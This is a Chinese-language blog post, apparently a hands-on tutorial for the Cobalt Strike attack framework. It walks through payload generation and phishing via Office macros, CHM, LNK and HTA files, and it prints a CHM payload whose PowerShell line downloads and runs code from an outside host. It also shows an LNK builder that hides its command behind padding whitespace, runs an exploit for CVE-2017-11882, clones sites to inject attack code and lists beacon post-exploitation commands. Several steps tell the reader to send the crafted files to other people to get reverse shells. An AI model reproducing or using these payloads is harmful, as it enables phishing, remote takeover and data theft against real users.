<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script> 
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">













<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico?v=6.5.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="Cobalt Strike简介： Cobalt Strike是一款渗透测试软件，分为客户端与服务端，服务端是一个，客户端可以有多个，可以进行团队分布式操作 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。  Cobalt St">
<meta property="og:type" content="article">
<meta property="og:title" content="Cobalt Strike的使用">
<meta property="og:url" content="http://yoursite.com/2018/12/03/Cobalt-Strike的使用/index.html">
<meta property="og:site_name" content="guolala&#39;s blog">
<meta property="og:description" content="Cobalt Strike简介： Cobalt Strike是一款渗透测试软件，分为客户端与服务端，服务端是一个，客户端可以有多个，可以进行团队分布式操作 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。  Cobalt St">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtpo5e81zj30kb051759.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrjw1900j30gb0ds0uu.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrlbdo9jj30ho0gi75u.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrpdchktj309506ddg2.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrtxrovnj30e008fjsh.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrwdkheej30680a6abx.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrwozazij30lc0e5ta0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrxwn4ggj30g90amgm3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts0m79xfj30f8095ta3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts1ei6p6j30as09sq3l.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts228nc4j30jg0bstdi.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts7532m1j30ez06wjtz.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsaxyhptj30if04yt8t.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsbuxzlmj30hu0gpgmr.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsc8a106j30fn0df75c.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtse09s5lj30g20a60to.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtse84g0ij306w03zaa1.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsh3ya15j30ha06cdg5.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsi0fbj1j30i202jt8p.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsjla457j30rk05qjty.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsocsziuj309u07tq3j.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtspws7kmj30qf0fs475.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsmcb19nj30hn08qdgq.jpg">
<meta property="og:updated_time" content="2018-12-03T11:46:51.611Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Cobalt Strike的使用">
<meta name="twitter:description" content="Cobalt Strike简介： Cobalt Strike是一款渗透测试软件，分为客户端与服务端，服务端是一个，客户端可以有多个，可以进行团队分布式操作 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。  Cobalt St">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtpo5e81zj30kb051759.jpg">



  <link rel="alternate" href="/atom.xml" title="guolala's blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2018/12/03/Cobalt-Strike的使用/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Cobalt Strike的使用 | guolala's blog</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">guolala's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">情迷不意乱</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/12/03/Cobalt-Strike的使用/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="guolala">
      <meta itemprop="description" content="growing up">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guolala's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Cobalt Strike的使用
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-12-03 17:56:34 / 修改时间：19:46:51" itemprop="dateCreated datePublished" datetime="2018-12-03T17:56:34+08:00">2018-12-03</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/渗透工具/" itemprop="url" rel="index"><span itemprop="name">渗透工具</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Cobalt-Strike简介："><a href="#Cobalt-Strike简介：" class="headerlink" title="Cobalt Strike简介："></a>Cobalt Strike简介：</h1><ul>
<li><strong>Cobalt Strike是一款渗透测试软件，分为客户端与服务端，服务端是一个，客户端可以有多个，可以进行团队分布式操作</strong></li>
<li><strong>Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。</strong></li>
</ul>
<h1 id="Cobalt-Strike的安装"><a href="#Cobalt-Strike的安装" class="headerlink" title="Cobalt Strike的安装"></a>Cobalt Strike的安装</h1><p>Ubuntu 默认只有openjdk的源，但是cobalt strike建议使用oracle jdk需要需要先加入源。</p>
<pre><code>apt-get install software-properties-common python-software-propertie

add-apt-repository ppa:webupd8team/java

apt-get update

apt-get install oracle-Java8-installer
</code></pre><p>下载好Cobalt Strike工具然后解压缩。</p>
<p>进入Cobalt Strike文件内部开启服务</p>
<pre><code>sudo ./teamserver 10.60.17.46 123456
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtpo5e81zj30kb051759.jpg" alt=""></p>
<p><strong>后面这两个数是服务器IP（ubuntu的IP）和密码</strong></p>
<h3 id="配置客户端"><a href="#配置客户端" class="headerlink" title="配置客户端"></a>配置客户端</h3><p>客户端需要安装java环境，平台并无特殊要求。</p>
<p>启动：</p>
<ul>
<li>Ubuntu:<code>java-jar cobalt strike</code></li>
<li>windows直接双击启动</li>
</ul>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrjw1900j30gb0ds0uu.jpg" alt=""></p>
<ul>
<li>host：服务器主机</li>
<li>port：50050</li>
<li>user：自定</li>
<li>password：服务器设置的</li>
</ul>
<h3 id="进入后首先配置监听器："><a href="#进入后首先配置监听器：" class="headerlink" title="进入后首先配置监听器："></a>进入后首先配置监听器：</h3><p>点击上方Cobalt Strike选项——&gt;在下拉框中选择listeners——&gt;在下方弹出区域中单机add</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrlbdo9jj30ho0gi75u.jpg" alt=""></p>
<ul>
<li>name：为监听器名字。</li>
<li>选择payload类型</li>
<li>host为shell反弹接受主机（服务端IP）</li>
<li>port为反弹端口</li>
</ul>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrpdchktj309506ddg2.jpg" alt=""></p>
<p>其实,监听器的作用很简单,主要是为了接受payload回传的各类数据</p>
<p>比如,我们的payload在目标机器执行以后,会回连到监听器然后下载执行真正的shellcode代码,其实跟msf中handler的作用基本是一致的</p>
<ul>
<li>beacon  为cs内置监听器,也就是说,当我们在目标系统成功执行payload以后,会弹回一个beacon的shell给cs 该shell所支持的通信协议主要包括这几种,dns,https,http,smb[pipe],另外,beacon shell的内置功能也非常多</li>
</ul>
<ul>
<li>foreign 主要是提供给外部使用的一些监听器,比如你想利用cs派生一个meterpreter的shell回来,来继续后面的内网渗透,这时就选择使用外部监听器</li>
</ul>
<h3 id="生成payload："><a href="#生成payload：" class="headerlink" title="生成payload："></a>生成payload：</h3><p>点击attacks——&gt;packages——&gt;windows executable</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrtxrovnj30e008fjsh.jpg" alt=""></p>
<ul>
<li>listener为监听器名字</li>
<li>output为输出靶机类型。</li>
<li>点击generate弹出的对话框中选择保存位置和输入payload名字。</li>
</ul>
<p>在windows靶机中双击payload生成文件（artifact.exe）</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrwdkheej30680a6abx.jpg" alt=""></p>
<p>得到反弹shell</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrwozazij30lc0e5ta0.jpg" alt=""></p>
<p>主机上线以后需要将默认刷新时间改成0，cobalt strike为了维持连接，会每60秒发送一次连接，但是如果使用的话60秒会造成卡顿。</p>
<p>修改方法：右键弹出的内容下拉菜单中选择session-&gt;sleep，弹出的对话框中输入0，单击确定</p>
<p><strong>右键弹出的内容下拉菜单中选择Interact，上线主机。</strong></p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtrxwn4ggj30g90amgm3.jpg" alt=""></p>
<h2 id="office钓鱼"><a href="#office钓鱼" class="headerlink" title="office钓鱼"></a>office钓鱼</h2><p>office钓鱼在无需交互、用户无感知的情况下，执行Office文档中内嵌的一段恶意代码，从远控地址中下载并运行恶意可执行程序，例如远控木马或者勒索病毒等。</p>
<p>Cobalt Strike office钓鱼主要方法是生成一段vba代码，然后将代码复制到office套件中，当用户启动office自动运行</p>
<h3 id="具体操作："><a href="#具体操作：" class="headerlink" title="具体操作："></a>具体操作：</h3><p>点击Cobalt Strike主界面中attacks-&gt;packages-&gt;ms office macro</p>
<p>弹出界面选择Listener，单机确定</p>
<p>对话框中给出每一步仔细操作，单机copy macro按钮</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts0m79xfj30f8095ta3.jpg" alt=""></p>
<h3 id="word操作"><a href="#word操作" class="headerlink" title="word操作"></a>word操作</h3><ul>
<li>点击上方标签视图标签</li>
<li>在该标签中点击宏按钮，弹出的对话框中输入宏名字，然后单机创建按钮</li>
</ul>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts1ei6p6j30as09sq3l.jpg" alt=""></p>
<ul>
<li>首先清空所有代码，然后将生成的代码复制到编辑器中，关闭宏编辑窗口</li>
<li>保存退出</li>
<li>双击再次运行保存的文档</li>
</ul>
<p>当目标机器运行文档以后，Cobalt Strike会接受到目标机器反弹的shell</p>
<p>目标则会增加一个rundll32.exe的进程</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts228nc4j30jg0bstdi.jpg" alt=""></p>
<h2 id="CVE-2017-11882漏洞简介"><a href="#CVE-2017-11882漏洞简介" class="headerlink" title="CVE-2017-11882漏洞简介"></a>CVE-2017-11882漏洞简介</h2><ul>
<li>漏洞为0ffice内存破坏漏洞，影响目前流行的所有0ffice版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。</li>
<li>该漏洞出现在模块EQNEDT32.EXE中，属于栈溢出漏洞，是对Equation Native 数据结构处理不当导致。</li>
</ul>
<h3 id="漏洞影响："><a href="#漏洞影响：" class="headerlink" title="漏洞影响："></a>漏洞影响：</h3><ul>
<li>Microsoft Office 2007</li>
<li>Microsoft Office 2010</li>
<li>Microsoft Office 2013</li>
<li>Microsoft Office 2016</li>
</ul>
<h3 id="复现："><a href="#复现：" class="headerlink" title="复现："></a>复现：</h3><p>下载<a href="https://github.com/Ridter/CVE-2017-11882python" target="_blank" rel="noopener">https://github.com/Ridter/CVE-2017-11882python</a>攻击脚本。</p>
<p>虽然是栈溢出漏洞，但是该漏洞对于命令有限制，分为可以执行43b和执行109b，所以在利用过程需要注意命令长度。</p>
<pre><code>python Command109b_CVE-2017-11882.py -c &quot;cmd.exe /c calc.exe&quot;
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxts7532m1j30ez06wjtz.jpg" alt=""></p>
<h2 id="CHM钓鱼"><a href="#CHM钓鱼" class="headerlink" title="CHM钓鱼"></a>CHM钓鱼</h2><h3 id="CHM介绍"><a href="#CHM介绍" class="headerlink" title="CHM介绍"></a>CHM介绍</h3><ul>
<li>CHM（Compiled Help Manual）即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。</li>
<li>利用CHM钓鱼主要原因是因为该文档可以执行cmd命令</li>
</ul>
<p>这里制作CHM需要用到一个工具就是 <strong>EasyCHM</strong></p>
<h3 id="CHM制作过程："><a href="#CHM制作过程：" class="headerlink" title="CHM制作过程："></a>CHM制作过程：</h3><p>创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件，在两个文件夹内部创建各创建一个index.html文件。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsaxyhptj30if04yt8t.jpg" alt=""></p>
<p>先将下列代码复制到根文件夹中的index.html中。</p>
<pre><code>&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Mousejack replay&lt;/title&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;
command exec 
&lt;OBJECT id=x classid=&quot;clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11&quot; width=1 height=1&gt;
&lt;PARAM name=&quot;Command&quot; value=&quot;ShortCut&quot;&gt;
 &lt;PARAM name=&quot;Button&quot; value=&quot;Bitmap::shortcut&quot;&gt;
 &lt;PARAM name=&quot;Item1&quot; value=&apos;,calc.exe&apos;&gt;
 &lt;PARAM name=&quot;Item2&quot; value=&quot;273,1,1&quot;&gt;
&lt;/OBJECT&gt;
&lt;SCRIPT&gt;
x.Click();
&lt;/SCRIPT&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre><p>打开我们的EasyCHM工具</p>
<p>后点击新建</p>
<p>然后导入自己创建的文件夹，点击确定后再点击编译，在弹出的对话框中点击生成CHM按钮</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsbuxzlmj30hu0gpgmr.jpg" alt=""></p>
<p>它会给你生产一个CHM文件，给别人发过去，一旦点击就会给弹出计算机</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsc8a106j30fn0df75c.jpg" alt=""></p>
<h3 id="生成钓鱼文件"><a href="#生成钓鱼文件" class="headerlink" title="生成钓鱼文件"></a>生成钓鱼文件</h3><p>启动Cobalt Strike，点击attacks——&gt;web Drive by——&gt;scripted web Delivery在弹出的对话框中将type类型设置为powershell然后单击launch按钮</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtse09s5lj30g20a60to.jpg" alt=""></p>
<p>再用代码将上面创建的根文件夹中的index.html代码中的calc.exe替换掉。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtse84g0ij306w03zaa1.jpg" alt=""></p>
<pre><code> &lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Mousejack replay&lt;/title&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;
command exec 
&lt;OBJECT id=x classid=&quot;clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11&quot; width=1 height=1&gt;
&lt;PARAM name=&quot;Command&quot; value=&quot;ShortCut&quot;&gt;
 &lt;PARAM name=&quot;Button&quot; value=&quot;Bitmap::shortcut&quot;&gt;
 &lt;PARAM name=&quot;Item1&quot; value=&quot;,powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(&apos;http://192.168.209.151:81/aa&apos;))&quot;&gt;
 &lt;PARAM name=&quot;Item2&quot; value=&quot;273,1,1&quot;&gt;
&lt;/OBJECT&gt;
&lt;SCRIPT&gt;
x.Click();
&lt;/SCRIPT&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre><p>生产CHM发送给别人，点击后获得反弹的shell</p>
<h2 id="LNK钓鱼"><a href="#LNK钓鱼" class="headerlink" title="LNK钓鱼"></a>LNK钓鱼</h2><ul>
<li>lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件，通常它以快捷方式放在硬盘上，以方便使用者快速的调用。</li>
<li>lnk钓鱼主要将图标伪装成正常图标，但是目标会执行shell命令。</li>
</ul>
<h3 id="先做个简单的powershell生产图标："><a href="#先做个简单的powershell生产图标：" class="headerlink" title="先做个简单的powershell生产图标："></a>先做个简单的powershell生产图标：</h3><p>创建个txt文本写入下面代码然后改文件后缀名为.ps1。</p>
<pre><code>cmd /c calc.exe
</code></pre><p> 右键文件powershell运行后会弹出计算器</p>
<h3 id="钓鱼方法："><a href="#钓鱼方法：" class="headerlink" title="钓鱼方法："></a>钓鱼方法：</h3><p>首先通过Cobalt Strike的attacks——&gt;web Drive by——&gt;scripted web Delivery</p>
<p>tpye类型为powershell，然后单机launch。生产代码。</p>
<p>还记的上面做的那个简单的powershell么，后缀改回txt，将生成的代码替换掉calc.exe</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsh3ya15j30ha06cdg5.jpg" alt=""></p>
<p> 将下面的powershell代码写入.ps1文件，右键运行powershell。</p>
<pre><code>$file = Get-Content &quot;test.txt&quot;
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(&quot;test.lnk&quot;)
$Shortcut.TargetPath = &quot;%SystemRoot%\system32\cmd.exe&quot;
$Shortcut.IconLocation = &quot;%SystemRoot%\System32\Shell32.dll,21&quot;
$Shortcut.Arguments = &apos;                                                                                                                                                                                                                                    &apos;+ $file
$Shortcut.Save()
</code></pre><p>生成test.lnk文件，而且图标改了（powershell执行文件要和test.txt要在一个目录下，这个图标所在位置就在<code>%SystemRoot%\System32\Shell32.dll</code>目录下）</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsi0fbj1j30i202jt8p.jpg" alt=""></p>
<p>后将test.lnk发送给他人，获得反弹shell。</p>
<h2 id="HTA钓鱼"><a href="#HTA钓鱼" class="headerlink" title="HTA钓鱼"></a>HTA钓鱼</h2><ul>
<li>HTA是HTML Application的缩写，直接将HTML保存成HTA的格式，是一个独立的应用软件。</li>
<li>HTA虽然用HTML、JS和CSS编写，却比普通网页权限大得多，它具有桌面程序的所有权限。</li>
<li>就是一个html应用程序，双击就能运行。</li>
</ul>
<h3 id="复现：-1"><a href="#复现：-1" class="headerlink" title="复现："></a>复现：</h3><p>Cobalt Strike，attacks——&gt;packages——&gt;HTML application</p>
<p>选择powershell然后单机generate，选择保存路径。</p>
<p>将生成的.hta文件发送给别人，点击后获得shell</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsjla457j30rk05qjty.jpg" alt=""></p>
<h2 id="网站克隆"><a href="#网站克隆" class="headerlink" title="网站克隆"></a>网站克隆</h2><ul>
<li>Cobalt Strike还能够实现网站克隆</li>
<li>cotalt strike能够快速复制目标网站前端页面，并且复制相识度极高</li>
<li>cotalt strike同时还可以在复制的网站中插入恶意代码，如果本地浏览器带有漏洞的用户，可以直接控制目标机器。</li>
</ul>
<p>点击attacks——&gt;Web Drive-by——&gt;Clone site</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsocsziuj309u07tq3j.jpg" alt=""></p>
<ul>
<li>Clone URL：克隆目标网站的URL（如果网站不是80端口的话域名后得跟上端口号。）</li>
<li>注意问题：URL需要添加http协议和端口（80）</li>
<li>Local URL：本地克隆路径</li>
<li>Local Host：本地主机IP</li>
<li>Local Port：本地端口</li>
<li>Attack：克隆后目标网站执行脚本，如：flash漏洞</li>
</ul>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtspws7kmj30qf0fs475.jpg" alt=""></p>
<h2 id="后渗透阶段"><a href="#后渗透阶段" class="headerlink" title="后渗透阶段"></a>后渗透阶段</h2><p>相信你已经能拿到一个beacon的shell了。</p>
<p>下面是一些基本的使用命令，但是cs监听器对中文支持并不友好，会对中文产生乱码。</p>
<pre><code>help     查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin 
note     给当前目录机器起个名字, eg: note beacon-shell
cd     在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用&apos;/&apos; eg: cd c:\\
mkdir      新建目录, eg: mkdir d:\\beacon
rm      删除文件或目录, eg: rm d:\\beacon
upload      上传文件到目标系统中
download 从目标系统下载指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel     取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell     在目标系统中执行指定的cmd命令, eg: shell whoami
getuid      查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd     查看当前在目录系统中的路径
ls     列出当前目录下的所有文件和目录
drives     列表出目标系统的所有分区[win中叫盘符]
ps     查看目标系统当前的所有的进程列表
kill     杀掉指定进程, eg: kill 4653
sleep 10 指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs     列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill     如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
clear     清除beacon内部的任务队列
checkin     强制让被控端回连一次
exit      终止当前beacon 会话
ctrl + k 清屏
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxtsmcb19nj30hn08qdgq.jpg" alt=""></p>
<blockquote>
<p>有些可能会触发敏感api导致防护报警,另外进程注入,被控端可能感到非常明显的卡顿,工具也有许多不完善的地方</p>
</blockquote>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/03/MySQL报错注入方法整理/" rel="next" title="MySQL报错注入方法整理">
                <i class="fa fa-chevron-left"></i> MySQL报错注入方法整理
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/03/lcx使用-端口转发/" rel="prev" title="lcx使用:端口转发">
                lcx使用:端口转发 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="guolala">
            
              <p class="site-author-name" itemprop="name">guolala</p>
              <p class="site-description motion-element" itemprop="description">growing up</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">27</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
